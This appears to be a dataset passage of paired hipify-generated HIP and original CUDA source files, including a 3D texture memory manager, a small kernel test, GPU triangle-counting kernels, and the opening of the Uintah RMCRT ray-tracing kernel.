cpyParamsUploadPtr.kind = hipMemcpyHostToDevice; MY_CUDA_SAFE_CALL( hipMemcpy3D(&cpyParamsUploadPtr) ); } ////////////////////////////////////////////////////////////////////////// //memory allocation ////////////////////////////////////////////////////////////////////////// HOST hipPitchedPtr TextureMemoryManager::allocateDataHost() { checkResolution(); freeDataHost(); MY_CUDA_SAFE_CALL( hipHostMalloc((void**)&texelsHost, resX * resY * resZ * sizeof(float3))); texelPtrHost = make_hipPitchedPtr(texelsHost, resX * sizeof(float3), resX * sizeof(float3), resY); return texelPtrHost; } HOST hipPitchedPtr TextureMemoryManager::allocateDataDevice() { checkResolution(); if(oldResX == resX && oldResY == resY && oldResZ == resZ) { return texelPtrDevice; } freeDataDevice(); //texelPtrDevice = // make_hipPitchedPtr(texelsDevice, resX * sizeof(float3), resX, resY); hipExtent cellDataExtent = make_hipExtent(resX * sizeof(float3), resY, resZ); MY_CUDA_SAFE_CALL( hipMalloc3D(&texelPtrDevice, cellDataExtent) ); oldResX = resX; oldResY = resY; oldResZ = resZ; return texelPtrDevice; 
} HOST void TextureMemoryManager::setDeviceCellsToZero() { MY_CUDA_SAFE_CALL( hipMemset(texelPtrDevice.ptr, 0 , texelPtrDevice.pitch * resY * resZ ) ); } ////////////////////////////////////////////////////////////////////////// //memory deallocation ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::freeDataDevice() { MY_CUDA_SAFE_CALL( hipFree((char*)texelPtrDevice.ptr) ); texelPtrDevice.ptr = NULL; } HOST void TextureMemoryManager::freeDataHost() { MY_CUDA_SAFE_CALL( hipHostFree((char*)texelPtrHost.ptr) ); texelPtrHost.ptr = NULL; } HOST void TextureMemoryManager::cleanup() { freeDataHost(); if(oldResX + oldResY + oldResZ != 0) { freeDataDevice(); oldResX = oldResY = oldResZ = 0; resX = resY = resZ = -1; } }
aa908474c53195cb8f6afbad9dfa20b5819c9daa.cu
/****************************************************************************/ /* Copyright (c) 2011, Javor Kalojanov * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /****************************************************************************/ #include "CUDAStdAfx.h" #include "Core/Algebra.hpp" #include "RT/Structure/3DTextureMemoryManager.h" HOST void TextureMemoryManager::checkResolution() { if (resX <= 0 || resY <= 0 || resZ <= 0) { cudastd::logger::out << "Invalid texture resolution!" << " Setting texture resolution to 32 x 32 x 32\n"; resX = resY = resZ = 32; } } ////////////////////////////////////////////////////////////////////////// //data transfer related ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::copyDataDeviceToHost() { cudaMemcpy3DParms cpyParamsDownloadPtr = { 0 }; cpyParamsDownloadPtr.srcPtr = texelPtrDevice; cpyParamsDownloadPtr.dstPtr = texelPtrHost; cpyParamsDownloadPtr.extent = make_cudaExtent(resX * sizeof(float3), resY, resZ); cpyParamsDownloadPtr.kind = cudaMemcpyDeviceToHost; MY_CUDA_SAFE_CALL( cudaMemcpy3D(&cpyParamsDownloadPtr) ); } HOST void TextureMemoryManager::copyDataHostToDevice() { cudaMemcpy3DParms cpyParamsUploadPtr = { 0 }; cpyParamsUploadPtr.srcPtr = texelPtrHost; cpyParamsUploadPtr.dstPtr = texelPtrDevice; cpyParamsUploadPtr.extent = make_cudaExtent(resX * sizeof(float3), resY, resZ); cpyParamsUploadPtr.kind = cudaMemcpyHostToDevice; MY_CUDA_SAFE_CALL( cudaMemcpy3D(&cpyParamsUploadPtr) ); } ////////////////////////////////////////////////////////////////////////// //memory allocation ////////////////////////////////////////////////////////////////////////// HOST cudaPitchedPtr TextureMemoryManager::allocateDataHost() { checkResolution(); freeDataHost(); MY_CUDA_SAFE_CALL( cudaMallocHost((void**)&texelsHost, resX * resY * resZ * sizeof(float3))); texelPtrHost = make_cudaPitchedPtr(texelsHost, resX * sizeof(float3), resX * sizeof(float3), resY); return texelPtrHost; } HOST cudaPitchedPtr TextureMemoryManager::allocateDataDevice() { checkResolution(); if(oldResX == resX && oldResY == resY && oldResZ == resZ) { return texelPtrDevice; } freeDataDevice(); //texelPtrDevice = // make_cudaPitchedPtr(texelsDevice, resX * sizeof(float3), resX, resY); cudaExtent cellDataExtent = make_cudaExtent(resX * sizeof(float3), resY, resZ); MY_CUDA_SAFE_CALL( cudaMalloc3D(&texelPtrDevice, cellDataExtent) ); oldResX = resX; oldResY = resY; oldResZ = resZ; return texelPtrDevice; } HOST void 
TextureMemoryManager::setDeviceCellsToZero() { MY_CUDA_SAFE_CALL( cudaMemset(texelPtrDevice.ptr, 0 , texelPtrDevice.pitch * resY * resZ ) ); } ////////////////////////////////////////////////////////////////////////// //memory deallocation ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::freeDataDevice() { MY_CUDA_SAFE_CALL( cudaFree((char*)texelPtrDevice.ptr) ); texelPtrDevice.ptr = NULL; } HOST void TextureMemoryManager::freeDataHost() { MY_CUDA_SAFE_CALL( cudaFreeHost((char*)texelPtrHost.ptr) ); texelPtrHost.ptr = NULL; } HOST void TextureMemoryManager::cleanup() { freeDataHost(); if(oldResX + oldResY + oldResZ != 0) { freeDataDevice(); oldResX = oldResY = oldResZ = 0; resX = resY = resZ = -1; } }
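cudaMalloc3D may pad every row of the texel block, so the device data cannot be indexed as a dense resX x resY x resZ array of float3. A minimal sketch of the addressing implied by the pitched pointers above; texelAt is an illustrative helper, the arithmetic is the same for the host and device blocks, and the device pointer can of course only be dereferenced from device code.

#include <cuda_runtime.h>  // cudaPitchedPtr, float3

// Address texel (x, y, z) inside a pitched allocation such as the ones created
// by allocateDataHost()/allocateDataDevice(): rows are pitch bytes apart and
// each z slice spans ysize rows.
static inline float3* texelAt(const cudaPitchedPtr& p, int x, int y, int z) {
  char* slice = (char*)p.ptr + (size_t)z * p.pitch * p.ysize;  // start of the z-th XY slice
  char* row   = slice + (size_t)y * p.pitch;                   // start of the y-th row
  return (float3*)row + x;                                     // x-th float3 in the row
}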
7f41158206296e7697790071a62e7a44382e9774.hip
// !!! This is a file automatically generated by hipify!!! #include <iostream> #include <unistd.h> #include <hip/hip_runtime.h> #include <helper_cuda.h> #include <helper_functions.h> #include <stdint.h> #include "hooklib.h" #include "protocol.hpp" #include "slimfast.hpp" #include "consumer.hpp" #include "impl.hpp" #include "devlogger.hpp" static const int NUM_BLOCKS = 2; static const int NUM_THREADS = 2; static const int NUM_TOTAL = NUM_BLOCKS * NUM_THREADS; static const int NUM_VALUES = 3; __device__ unsigned int counter = 0; __global__ void producer(unsigned int* data) { int id = ((blockDim.x * blockIdx.x) + threadIdx.x); for(int i = 0; i < NUM_VALUES; ++i ) { data[id] += 1; __store_op(&data[id], OP_READ); __store_op(&data[id], OP_WRITE); } } /// host code int main(int argc, char* argv[]) { Impl impl; // Launch the kernel. unsigned int* dev_data; checkCudaErrors(hipMalloc(&dev_data, sizeof(unsigned int) * NUM_TOTAL)); checkCudaErrors(hipMemset(dev_data, 0, sizeof(unsigned int) * NUM_TOTAL)); unsigned int* host_data = (unsigned int*)malloc(sizeof(unsigned int) * NUM_TOTAL); hipLaunchKernelGGL(( producer), dim3(NUM_BLOCKS), dim3(NUM_THREADS), 0, 0, dev_data); checkCudaErrors(hipDeviceSynchronize()); checkCudaErrors(hipMemcpy(host_data, dev_data, sizeof(unsigned int) * NUM_TOTAL, hipMemcpyDeviceToHost)); for(int i = 0; i < NUM_TOTAL; ++ i) { if(host_data[i] != NUM_VALUES) { fprintf(stderr, "Error at index: %i\n", i); exit(-1); } } return 0; }
7f41158206296e7697790071a62e7a44382e9774.cu
#include <iostream> #include <unistd.h> #include <cuda_runtime.h> #include <helper_cuda.h> #include <helper_functions.h> #include <stdint.h> #include "hooklib.h" #include "protocol.hpp" #include "slimfast.hpp" #include "consumer.hpp" #include "impl.hpp" #include "devlogger.hpp" static const int NUM_BLOCKS = 2; static const int NUM_THREADS = 2; static const int NUM_TOTAL = NUM_BLOCKS * NUM_THREADS; static const int NUM_VALUES = 3; __device__ unsigned int counter = 0; __global__ void producer(unsigned int* data) { int id = ((blockDim.x * blockIdx.x) + threadIdx.x); for(int i = 0; i < NUM_VALUES; ++i ) { data[id] += 1; __store_op(&data[id], OP_READ); __store_op(&data[id], OP_WRITE); } } /// host code int main(int argc, char* argv[]) { Impl impl; // Launch the kernel. unsigned int* dev_data; checkCudaErrors(cudaMalloc(&dev_data, sizeof(unsigned int) * NUM_TOTAL)); checkCudaErrors(cudaMemset(dev_data, 0, sizeof(unsigned int) * NUM_TOTAL)); unsigned int* host_data = (unsigned int*)malloc(sizeof(unsigned int) * NUM_TOTAL); producer<<<NUM_BLOCKS, NUM_THREADS>>>(dev_data); checkCudaErrors(cudaDeviceSynchronize()); checkCudaErrors(cudaMemcpy(host_data, dev_data, sizeof(unsigned int) * NUM_TOTAL, cudaMemcpyDeviceToHost)); for(int i = 0; i < NUM_TOTAL; ++ i) { if(host_data[i] != NUM_VALUES) { fprintf(stderr, "Error at index: %i\n", i); exit(-1); } } return 0; }
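The example checks the result of cudaDeviceSynchronize() but not the launch itself. A hedged fragment showing an extra probe with cudaGetLastError(); producer, NUM_BLOCKS, NUM_THREADS, dev_data and checkCudaErrors are the names from the file above, not new definitions.

// Probe for launch-configuration errors immediately after the <<<>>> launch,
// before waiting on the kernel itself.
producer<<<NUM_BLOCKS, NUM_THREADS>>>(dev_data);
checkCudaErrors(cudaGetLastError());       // invalid grid/block dims, no device, ...
checkCudaErrors(cudaDeviceSynchronize());  // errors raised while the kernel ran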
9f206e5885080195687b3c6b4fb6fa38e366f19a.hip
// !!! This is a file automatically generated by hipify!!! #include "gg.h" #include "ggcuda.h" #include "hipcub/hipcub.hpp" #include "hipcub/hipcub.hpp" #include "thread_work.h" void kernel_sizing(CSRGraph &, dim3 &, dim3 &); #define TB_SIZE 256 #include "kernels/reduce.cuh" #include "tc_cuda.cuh" #include "kernels/segmentedsort.cuh" #include "moderngpu.cuh" #include "util/mgpucontext.h" #include <hip/hip_runtime_api.h> mgpu::ContextPtr mgc; #define WARP_SIZE 32 inline __device__ unsigned long intersect(CSRGraph graph, index_type u, index_type v) { index_type u_start = graph.getFirstEdge(u); index_type u_end = u_start + graph.getOutDegree(u); index_type v_start = graph.getFirstEdge(v); index_type v_end = v_start + graph.getOutDegree(v); unsigned long count = 0; index_type u_it = u_start; index_type v_it = v_start; index_type a; index_type b; while (u_it < u_end && v_it < v_end) { a = graph.getAbsDestination(u_it); b = graph.getAbsDestination(v_it); int d = a - b; if (d <= 0) u_it++; if (d >= 0) v_it++; if (d == 0) count++; } return count; } __global__ void base(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned tid = blockIdx.x * blockDim.x + threadIdx.x; unsigned long local_total = 0; __shared__ hipcub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); for (index_type src = begin + tid; src < end; src += TOTAL_THREADS_1D) { index_type row_begin = graph.getFirstEdge(src); index_type row_end = row_begin + graph.getOutDegree(src); for (index_type offset = row_begin; offset < row_end; ++ offset) { index_type dst = graph.getAbsDestination(offset); local_total = intersect(graph, dst, src); if (local_total) num_local_triangles.reduce(local_total); } } num_local_triangles.thread_exit<hipcub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } inline __device__ bool serial_search(CSRGraph graph, unsigned key, index_type begin, index_type end) { for (index_type offset = begin; offset < end; ++ offset) { index_type d = graph.getAbsDestination(offset); if (d == key) return true; if (d > key) return false; } return false; } inline __device__ bool binary_search(CSRGraph graph, index_type key, index_type begin, index_type end) { assert(begin < end); int l = begin; int r = end-1; while (r >= l) { //assert(l<graph.nedges && r<graph.nedges); int mid = l + (r - l) / 2; if (mid >= graph.nedges) printf("mid=%u, l=%u, r=%u, begin=%u, end=%u, key=%u\n", mid, l, r, begin, end, key); assert(mid < graph.nedges); index_type value = graph.getAbsDestination(mid); if (value == key) return true; if (value < key) l = mid + 1; else r = mid - 1; } return false; } __global__ void warp(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned thread_id = blockIdx.x * blockDim.x + threadIdx.x; unsigned thread_lane = threadIdx.x & (WARP_SIZE-1); // thread index within the warp unsigned warp_id = thread_id / WARP_SIZE; // global warp index unsigned warp_lane = threadIdx.x / WARP_SIZE; // warp index within the CTA unsigned num_warps = (TB_SIZE / WARP_SIZE) * gridDim.x; // total number of active warps __shared__ hipcub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); // each warp takes one vertex for (index_type src = begin + warp_id; src < end; src += num_warps) { index_type row_begin = graph.getFirstEdge(src); index_type src_size = graph.getOutDegree(src); index_type row_end = row_begin + 
src_size; // take one edge for (index_type offset = row_begin; offset < row_end; offset ++) { index_type dst = graph.getAbsDestination(offset); assert(src != dst); index_type dst_size = graph.getOutDegree(dst); index_type lookup = src; index_type search = dst; if (src_size > dst_size) { lookup = dst; search = src; } index_type lookup_begin = graph.getFirstEdge(lookup); index_type lookup_size = graph.getOutDegree(lookup); index_type search_size = graph.getOutDegree(search); if (lookup_size > 0 && search_size > 0) { for (index_type i = thread_lane; i < lookup_size; i += WARP_SIZE) { index_type index = lookup_begin + i; index_type key = graph.getAbsDestination(index); index_type search_begin = graph.getFirstEdge(search); if (binary_search(graph, key, search_begin, search_begin+search_size)) //if (serial_search(graph, key, search_begin, search_begin+search_size)) num_local_triangles.reduce(1); } } } } num_local_triangles.thread_exit<hipcub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } void sort_cuda(struct CUDA_Context* ctx) { mgc = mgpu::CreateCudaDevice(ctx->device); mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); } void TC_cuda(unsigned __begin, unsigned __end, unsigned long & num_local_triangles, struct CUDA_Context* ctx) { dim3 blocks; dim3 threads; kernel_sizing(blocks, threads); HGAccumulator<unsigned long> _num_local_triangles; Shared<unsigned long> num_local_trianglesval = Shared<unsigned long>(1); *(num_local_trianglesval.cpu_wr_ptr()) = 0; _num_local_triangles.rv = num_local_trianglesval.gpu_wr_ptr(); //mgc = mgpu::CreateCudaDevice(ctx->device); //mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); //base<<<blocks, TB_SIZE>>>(ctx->gg, __begin, __end, _num_local_triangles); hipLaunchKernelGGL(( warp), dim3(blocks), dim3(TB_SIZE), 0, 0, ctx->gg, __begin, __end, _num_local_triangles); hipDeviceSynchronize(); check_cuda_kernel; num_local_triangles = *(num_local_trianglesval.cpu_rd_ptr()); //dump_memory_info("end", ctx->id); hipProfilerStop(); //num_local_triangles = (unsigned)h_total; } void TC_masterNodes_cuda(unsigned long& num_local_triangles, struct CUDA_Context* ctx) { TC_cuda(ctx->beginMaster, ctx->beginMaster + ctx->numOwned, num_local_triangles, ctx); }
9f206e5885080195687b3c6b4fb6fa38e366f19a.cu
#include "gg.h" #include "ggcuda.h" #include "cub/cub.cuh" #include "cub/util_allocator.cuh" #include "thread_work.h" void kernel_sizing(CSRGraph &, dim3 &, dim3 &); #define TB_SIZE 256 #include "kernels/reduce.cuh" #include "tc_cuda.cuh" #include "kernels/segmentedsort.cuh" #include "moderngpu.cuh" #include "util/mgpucontext.h" #include <cuda_profiler_api.h> mgpu::ContextPtr mgc; #define WARP_SIZE 32 inline __device__ unsigned long intersect(CSRGraph graph, index_type u, index_type v) { index_type u_start = graph.getFirstEdge(u); index_type u_end = u_start + graph.getOutDegree(u); index_type v_start = graph.getFirstEdge(v); index_type v_end = v_start + graph.getOutDegree(v); unsigned long count = 0; index_type u_it = u_start; index_type v_it = v_start; index_type a; index_type b; while (u_it < u_end && v_it < v_end) { a = graph.getAbsDestination(u_it); b = graph.getAbsDestination(v_it); int d = a - b; if (d <= 0) u_it++; if (d >= 0) v_it++; if (d == 0) count++; } return count; } __global__ void base(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned tid = blockIdx.x * blockDim.x + threadIdx.x; unsigned long local_total = 0; __shared__ cub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); for (index_type src = begin + tid; src < end; src += TOTAL_THREADS_1D) { index_type row_begin = graph.getFirstEdge(src); index_type row_end = row_begin + graph.getOutDegree(src); for (index_type offset = row_begin; offset < row_end; ++ offset) { index_type dst = graph.getAbsDestination(offset); local_total = intersect(graph, dst, src); if (local_total) num_local_triangles.reduce(local_total); } } num_local_triangles.thread_exit<cub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } inline __device__ bool serial_search(CSRGraph graph, unsigned key, index_type begin, index_type end) { for (index_type offset = begin; offset < end; ++ offset) { index_type d = graph.getAbsDestination(offset); if (d == key) return true; if (d > key) return false; } return false; } inline __device__ bool binary_search(CSRGraph graph, index_type key, index_type begin, index_type end) { assert(begin < end); int l = begin; int r = end-1; while (r >= l) { //assert(l<graph.nedges && r<graph.nedges); int mid = l + (r - l) / 2; if (mid >= graph.nedges) printf("mid=%u, l=%u, r=%u, begin=%u, end=%u, key=%u\n", mid, l, r, begin, end, key); assert(mid < graph.nedges); index_type value = graph.getAbsDestination(mid); if (value == key) return true; if (value < key) l = mid + 1; else r = mid - 1; } return false; } __global__ void warp(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned thread_id = blockIdx.x * blockDim.x + threadIdx.x; unsigned thread_lane = threadIdx.x & (WARP_SIZE-1); // thread index within the warp unsigned warp_id = thread_id / WARP_SIZE; // global warp index unsigned warp_lane = threadIdx.x / WARP_SIZE; // warp index within the CTA unsigned num_warps = (TB_SIZE / WARP_SIZE) * gridDim.x; // total number of active warps __shared__ cub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); // each warp takes one vertex for (index_type src = begin + warp_id; src < end; src += num_warps) { index_type row_begin = graph.getFirstEdge(src); index_type src_size = graph.getOutDegree(src); index_type row_end = row_begin + src_size; // take one edge for (index_type offset = row_begin; offset < 
row_end; offset ++) { index_type dst = graph.getAbsDestination(offset); assert(src != dst); index_type dst_size = graph.getOutDegree(dst); index_type lookup = src; index_type search = dst; if (src_size > dst_size) { lookup = dst; search = src; } index_type lookup_begin = graph.getFirstEdge(lookup); index_type lookup_size = graph.getOutDegree(lookup); index_type search_size = graph.getOutDegree(search); if (lookup_size > 0 && search_size > 0) { for (index_type i = thread_lane; i < lookup_size; i += WARP_SIZE) { index_type index = lookup_begin + i; index_type key = graph.getAbsDestination(index); index_type search_begin = graph.getFirstEdge(search); if (binary_search(graph, key, search_begin, search_begin+search_size)) //if (serial_search(graph, key, search_begin, search_begin+search_size)) num_local_triangles.reduce(1); } } } } num_local_triangles.thread_exit<cub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } void sort_cuda(struct CUDA_Context* ctx) { mgc = mgpu::CreateCudaDevice(ctx->device); mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); } void TC_cuda(unsigned __begin, unsigned __end, unsigned long & num_local_triangles, struct CUDA_Context* ctx) { dim3 blocks; dim3 threads; kernel_sizing(blocks, threads); HGAccumulator<unsigned long> _num_local_triangles; Shared<unsigned long> num_local_trianglesval = Shared<unsigned long>(1); *(num_local_trianglesval.cpu_wr_ptr()) = 0; _num_local_triangles.rv = num_local_trianglesval.gpu_wr_ptr(); //mgc = mgpu::CreateCudaDevice(ctx->device); //mgpu::SegSortKeysFromIndices(ctx->gg.edge_dst, ctx->gg.nedges, (const int *) ctx->gg.row_start + 1, ctx->gg.nnodes - 1, *mgc); //base<<<blocks, TB_SIZE>>>(ctx->gg, __begin, __end, _num_local_triangles); warp<<<blocks, TB_SIZE>>>(ctx->gg, __begin, __end, _num_local_triangles); cudaDeviceSynchronize(); check_cuda_kernel; num_local_triangles = *(num_local_trianglesval.cpu_rd_ptr()); //dump_memory_info("end", ctx->id); cudaProfilerStop(); //num_local_triangles = (unsigned)h_total; } void TC_masterNodes_cuda(unsigned long& num_local_triangles, struct CUDA_Context* ctx) { TC_cuda(ctx->beginMaster, ctx->beginMaster + ctx->numOwned, num_local_triangles, ctx); }
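For validating num_local_triangles, a serial host reference that mirrors the merge-based intersect() in the base kernel is useful. A hedged sketch over plain CSR arrays; count_triangles_host and the std::vector layout are assumptions for illustration, not part of the CSRGraph/CUDA_Context API, and like the base kernel it counts one hit per directed edge.

#include <cstdint>
#include <vector>

// CSR convention assumed: row_start has nnodes+1 entries and edge_dst holds
// each vertex's neighbors in ascending order (as after sort_cuda above).
uint64_t count_triangles_host(const std::vector<int>& row_start,
                              const std::vector<int>& edge_dst) {
  uint64_t total = 0;
  int nnodes = (int)row_start.size() - 1;
  for (int u = 0; u < nnodes; ++u) {
    for (int e = row_start[u]; e < row_start[u + 1]; ++e) {
      int v = edge_dst[e];
      // Merge-intersect the sorted neighbor lists of u and v.
      int a = row_start[u], a_end = row_start[u + 1];
      int b = row_start[v], b_end = row_start[v + 1];
      while (a < a_end && b < b_end) {
        int d = edge_dst[a] - edge_dst[b];
        if (d <= 0) ++a;
        if (d >= 0) ++b;
        if (d == 0) ++total;
      }
    }
  }
  return total;
}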
4af0e54c4c3497c17d9e89041e6ff7533ac12d13.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * The MIT License * * Copyright (c) 1997-2018 The University of Utah * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include <CCA/Components/Models/Radiation/RMCRT/RayGPU.cuh> #include <CCA/Components/Schedulers/GPUDataWarehouse.h> #include <CCA/Components/Schedulers/GPUMemoryPool.h> #include <CCA/Components/Schedulers/DetailedTasks.h> #include <Core/Grid/Variables/GPUGridVariable.h> #include <Core/Grid/Variables/GPUStencil7.h> #include <Core/Grid/Variables/Stencil7.h> #include <Core/Util/GPU.h> #include <sci_defs/cuda_defs.h> #include <sci_defs/uintah_defs.h> #include <hiprand/hiprand.h> #include <hiprand/hiprand_kernel.h> #define __CUDA_INTERNAL_COMPILATION__ #include "math_functions.h" // needed for max() #undef __CUDA_INTERNAL_COMPILATION__ #define DEBUG -9 // 1: divQ, 2: boundFlux, 3: scattering //#define FIXED_RANDOM_NUM // also edit in src/Core/Math/MersenneTwister.h to compare with Ray:CPU #define FIXED_RAY_DIR -9 // Sets ray direction. 1: (0.7071,0.7071, 0), 2: (0.7071, 0, 0.7071), 3: (0, 0.7071, 0.7071) // 4: (0.7071, 0.7071, 7071), 5: (1,0,0) 6: (0, 1, 0), 7: (0,0,1) #define SIGN 1 // Multiply the FIXED_RAY_DIRs by value //__________________________________ // To Do // - Investigate using multiple GPUs per node. // - Implement fixed and dynamic ROI. // - dynamic block size? // - Implement labelNames in unified memory. 
// - investigate the performance with different patch configurations // - deterministic random numbers // - Ray steps //__________________________________ // // To use cuda-gdb on a single GPU you must set the environmental variable // CUDA_DEBUGGER_SOFTWARE_PREEMPTION=1 // // mpirun -np 1 xterm -e cuda-gdb sus -gpu -nthreads 2 <args> //__________________________________ namespace Uintah { //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer kernel //--------------------------------------------------------------------------- template< class T> __global__ void rayTraceKernel( dim3 dimGrid, dim3 dimBlock, const int matl, levelParams level, patchParams patch, hiprandState_t* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // Not used right now // int blockID = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; // int threadID = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; // calculate the thread indices int tidX = threadIdx.x + blockIdx.x * blockDim.x + patch.loEC.x; int tidY = threadIdx.y + blockIdx.y * blockDim.y + patch.loEC.y; const GPUGridVariable< T > sigmaT4OverPi; const GPUGridVariable< T > abskg; // Need to use getRegion() to get the data const GPUGridVariable<int> cellType; GPUGridVariable<double> divQ; GPUGridVariable<GPUStencil7> boundFlux; GPUGridVariable<double> radiationVolQ; // sigmaT4_gdw->print(); sigmaT4_gdw->getLevel( sigmaT4OverPi, "sigmaT4", matl, level.index); cellType_gdw->getLevel( cellType, "cellType", matl, level.index); if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg, "abskgRMCRT", matl, level.index); }else{ abskg_gdw->getLevel( abskg, "abskg", matl, level.index); } if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ, "divQ", patch.ID, matl ); new_gdw->getModifiable( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->getModifiable( radiationVolQ,"radiationVolq", patch.ID, matl ); }else{ new_gdw->get( divQ, "divQ", patch.ID, matl ); // these should be allocateAndPut() calls new_gdw->get( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->get( radiationVolQ,"radiationVolq", patch.ID, matl ); // Extra Cell Loop if ( (tidX >= patch.loEC.x) && (tidY >= patch.loEC.y) && (tidX < patch.hiEC.x) && (tidY < patch.hiEC.y) ) { // patch boundary check #pragma unroll for (int z = patch.loEC.z; z < patch.hiEC.z; z++) { // loop through z slices GPUIntVector c = make_int3(tidX, tidY, z); divQ[c] = 0.0; radiationVolQ[c] = 0.0; boundFlux[c].initialize(0.0); } } } //__________________________________ // Sanity checks #if 0 if (isThread0()) { printf(" GPUVariable Sanity check level: %i, patch: %i \n",level.index, patch.ID); } #endif GPUVariableSanityCK(abskg, patch.loEC, patch.hiEC); GPUVariableSanityCK(sigmaT4OverPi, patch.loEC, patch.hiEC); bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme const int size = 1000; int rand_i[ size ]; //Give it a buffer room of 1000. But we should only use nFluxRays items in it. //Hopefully this 1000 will always be greater than nFluxRays. 
//TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) and computation time (don't need to compute //the rays twice) if (nFluxRays > size) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. nFluxRays is %d, size of the array is.%d\n\n\n", nFluxRays, size); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. return; } //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveBoundaryFlux ){ __shared__ int3 dirIndexOrder[6]; __shared__ int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); 